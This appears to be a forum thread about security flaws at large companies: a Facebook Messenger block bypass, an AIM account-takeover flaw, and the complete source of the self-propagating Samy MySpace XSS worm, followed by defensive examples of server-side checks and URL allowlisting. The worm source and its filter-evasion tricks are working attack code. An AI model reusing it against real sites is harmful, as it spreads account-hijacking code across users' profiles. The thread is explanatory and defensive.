Even giant companies have security flaws

Ghost

I have not recently tried to replicate the bug I am about to disclose, but I experienced a security flaw on a major website a few days ago. It's not the biggest bug, but also not the smallest either. I want to mention it here because it doesn't actually compromise any accounts or personal details, and I think it highlights an important aspect of the internet, apps, and devices: Even large multi-billion dollar companies can have security flaws, bugs, and problems.

I think it is too often that we criticize ourselves or other websites for problems that arise. Whether it's a design bug on a mobile version or a bug that prevents us from posting on a forum, many of us have been too quick to act like the webmaster/administrator is not doing their job. Perhaps we should focus more on the fact that the site exists in the first place, and the site is clearly so wonderful that we feel frustrated when something doesn't work. After all, I discovered a fairly large-ish bug on Facebook just the other day.

I was speaking with someone about selling some sound equipment and they did not agree with my asking price. The device is a few years old, but is in mint condition and was worth over $1,000 retail and goes for around $350 used now. I was asking for $200, but they only wanted to pay $100. I obviously did not agree to this, but they kept pushing and eventually blocked me on Facebook messenger. However, a bug occurred and I did not notice I was blocked.

I was able to continue messaging the potential buyer and I sent 3 messages trying to convince them why $200 was a more than fair asking price for the sound receiver. Suddenly they accused me of hacking because they had blocked me & threatened to call the police. It was absolutely absurd and I couldn't figure out what they were even talking about. I was able to send them messages & receive messages from them without an issue. Being the nerd I am though, I went on to my PC and opened up Facebook there. I kept my iPhone ready at my side. Sure enough, when I went to Facebook's messages page I was unable to reply to the potential buyer. They had in fact blocked me. I tried reloading the page and everything, to no avail. And yet when I picked my iPhone back up, I was able to still send messages because their chat box was still open and for some reason the app had not received the message that I was blocked. Now, this obviously opens up a lot of potential reasons for the security flaw... Why is Facebook's messaging software not checking for blocked users on the server side? This seemed to be a clear case where a web browser & mobile app could both send messages, but their code on the actual server was not ensuring there were no blocks in place before sending the message. I should have received an error when attempting to send a message... However, it seems that the mobile app itself is responsible for preventing me from sending messages if I'm blocked.

I explained this weird issue to the buyer and said goodbye. I then closed the mobile app, reopened it & reloaded my messages list, and sure enough, when I clicked their message I was now unable to send new messages. The app had finally received the alert from Facebook that I was blocked... but it had not occurred originally because I had not closed the chat on my phone. It seems that the mobile app only receives new data about blocks if you close the app and/or go to your messages list, but if you have an active chat open it will continue to let you send messages even if you're blocked.

So, obviously this is a fairly big bug that could affect victims in harassment cases because the bug persisted for a while. There was over 45 minutes of time before I closed the app and refreshed. Simply put, the app was never going to prevent me from sending a message to the potential buyer as long as I kept his chat window open on my phone.

Perhaps this is a bit long-winded, but I just wanted to share my story here to remind you all that even large companies have issues with their websites, apps, and servers. I hope we can all keep this in mind before jumping the gun & criticizing an administrator who is working their butt off just because something goes wrong. 🙂
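The pattern described in the post above (the client caches "can I message this person?" when the chat is opened, and the server never re-checks) next to a server that consults the block list on every send. This is an added example with a hypothetical in-memory backend and constructed sample data; it is not Facebook's code and none of the names come from the original post.

```javascript
// Added example, not from the original post: a toy messaging backend showing
// the "block enforced only in the client" pattern the post describes, next to
// a server that checks the block on every send. All names are hypothetical.
'use strict';

// Server-side, authoritative store of who has blocked whom.
class BlockList {
  constructor() { this.pairs = new Set(); }
  block(blocker, blocked) { this.pairs.add(`${blocker}->${blocked}`); }
  // sender cannot message recipient if recipient has blocked sender
  isBlocked(sender, recipient) { return this.pairs.has(`${recipient}->${sender}`); }
}

// Client behaviour from the post: "can I message this person?" is fetched when
// the chat is opened and cached until the chat is closed or the list reloaded.
class ChatClient {
  constructor(blocks, me, peer) {
    this.blocks = blocks; this.me = me; this.peer = peer;
    this.refresh();
  }
  refresh() { this.cachedCanSend = !this.blocks.isBlocked(this.me, this.peer); }
  canSend() { return this.cachedCanSend; }
}

// Vulnerable server: the only block check is the one the client already did.
function sendTrustingClient(blocks, client, inbox, text) {
  if (!client.canSend()) return { ok: false, reason: 'client-side block' };
  inbox.push({ from: client.me, to: client.peer, text });
  return { ok: true };
}

// Hardened server: re-checks the authoritative block list on every send, so a
// stale client cache cannot bypass it.
function sendWithServerCheck(blocks, client, inbox, text) {
  if (blocks.isBlocked(client.me, client.peer)) return { ok: false, reason: 'blocked' };
  inbox.push({ from: client.me, to: client.peer, text });
  return { ok: true };
}

// Replays the post's timeline: chat opened, recipient blocks sender, sender
// keeps typing in the still-open chat, then closes and reopens the chat.
function replay(sendFn) {
  const blocks = new BlockList();
  const inbox = [];                       // buyer's inbox (constructed sample data)
  const chat = new ChatClient(blocks, 'seller', 'buyer');
  const results = [];
  results.push(sendFn(blocks, chat, inbox, '$200 is fair').ok);     // before the block
  blocks.block('buyer', 'seller');                                   // buyer blocks seller
  results.push(sendFn(blocks, chat, inbox, 'still there?').ok);      // stale client cache
  results.push(sendFn(blocks, chat, inbox, 'hello?').ok);
  chat.refresh();                                                    // close/reopen chat
  results.push(sendFn(blocks, chat, inbox, 'one more').ok);
  return { delivered: inbox.length, results };
}

console.log('client-only check:', replay(sendTrustingClient));   // delivered: 3
console.log('server-side check:', replay(sendWithServerCheck)); // delivered: 1
```

With the client-only check, every message typed into the still-open chat is delivered until the client happens to refresh; with the server-side check, the first send after the block is rejected no matter how stale the client's view is. The client-side check is still worth keeping for a good error message, but it is a UI nicety, not the control.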
 
I used to be able to reset people's Facebook passwords to what I wanted without actually knowing any of their information at all. (This has since been fixed)
There will always be security flaws one way or another 😛
This reminds me of a security flaw with AOL/AIM.
There was an old foreign sign-up page (if I remember correctly, it was their Russian registration page/site) that allowed you to take ownership of accounts.
Basically, there were errors with the username-availability checker on the foreign sign-up page, so you could register AIM accounts that were already taken. You could then use this new account to log in to the server with all of the account details changed, including password-reset options like the email address, the password itself, etc. The security flaw was spread around for over a year before it was patched, and it was kept secret before word got out too. A small group of hackers used that method for a long time.

There were a lot of AIM/AOL exploits that allowed hackers to take control of accounts, suspend/ban them, and more for years.

Another example that comes to mind is all of the MySpace exploits. The most famous was the Samy worm (an XSS vulnerability) that sent Samy a friend request from your account & wrote "but most of all, samy is my hero" on your profile. It spread like wildfire and affected countless profiles. As you can see, it was actually pretty well thought out, but obviously illegal. Here's how it was done.

Here is the end-result code that Samy wrote. Any time a user encountered an affected profile, their own profile was compromised right after... and so on and so on. Once it was released, there was absolutely nothing Samy could do to stop it. It used basic JavaScript with some unique methods to avoid MySpace breaking the code.
```html
<!-- The line break inside "java / script:" and the string splits such as
     'inne'+'rHTML' and 'onr'+'eadystatechange' are part of the worm as written
     (its filter evasion), not transcription damage. -->
<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var 
AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>
```
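The worm code in the post above splits the word "javascript" across a line break and assembles names like innerHTML out of pieces ('inne'+'rHTML'). The added example below (my own code, not Samy's worm and not MySpace's actual filter) shows why a keyword blacklist of the kind those tricks were aimed at lets such markup through, and what a check that normalises the URL first and then allows only plain http(s) does instead. The sample markup strings are constructed, and the assumption that the browser of the day ignored whitespace inside the scheme (so "java\nscript:" ran as "javascript:") is documented in the worm's own write-ups.

```javascript
// Added example, not Samy's worm code and not MySpace's filter: why a keyword
// blacklist misses the "java\nscript:" and 'inne'+'rHTML' splitting visible in
// the worm above, and what a normalise-then-allowlist check does instead.
'use strict';

// Constructed sample inputs (hypothetical markup, not the real profile pages).
const OBVIOUS = `<div style="background:url('javascript:alert(1)')"></div>`;
const WORM_LIKE =
  `<div id=mycode style="background:url('java\nscript:eval(document.all.mycode.expr)')"` +
  ` expr="eval('document.body.inne'+'rHTML')"></div>`;
const BENIGN = `<div style="background:url('http://example.com/hero.png')"></div>`;

// A blacklist filter of the kind the worm was built to evade: delete literal
// dangerous tokens and let everything else through.
function naiveStrip(html) {
  return html.replace(/javascript|innerHTML|onreadystatechange/gi, '');
}

// Pull every url(...) value out of inline style attributes.
function styleUrls(html) {
  const re = /url\(\s*(['"]?)([\s\S]*?)\1\s*\)/gi;
  return [...html.matchAll(re)].map((m) => m[2]);
}

// Assumption (from the worm's write-ups): the browser ignored whitespace inside
// the scheme, so "java\nscript:" ran as "javascript:". Normalise the same way
// before making any decision about the URL.
function normalizeUrl(url) {
  return url.replace(/[\s\x00-\x1f]/g, '').toLowerCase();
}

// Allowlist check: after normalisation, a style URL must be a plain http(s)
// URL; anything else is rejected outright rather than "cleaned".
function styleUrlsAreSafe(html) {
  return styleUrls(html).every((u) => /^https?:\/\//.test(normalizeUrl(u)));
}

// Does the (stripped) markup still carry a script URL once normalised?
function stillHasScriptUrl(html) {
  return styleUrls(html).some((u) => normalizeUrl(u).startsWith('javascript:'));
}

console.log('obvious payload after naive strip still scripts?',
  stillHasScriptUrl(naiveStrip(OBVIOUS)));                       // false
console.log('worm-like payload after naive strip still scripts?',
  stillHasScriptUrl(naiveStrip(WORM_LIKE)));                     // true
console.log('allowlist verdicts (benign, worm-like, obvious):',
  styleUrlsAreSafe(BENIGN), styleUrlsAreSafe(WORM_LIKE), styleUrlsAreSafe(OBVIOUS)); // true false false
```

The blacklist handles the obvious payload and passes the split one untouched, which is exactly the gap the worm exploited. Normalising before checking, and allowing a short list of schemes instead of forbidding a list of words, closes both the whitespace trick and the string-concatenation trick, because the decision no longer depends on spotting a keyword in the attacker's spelling of it.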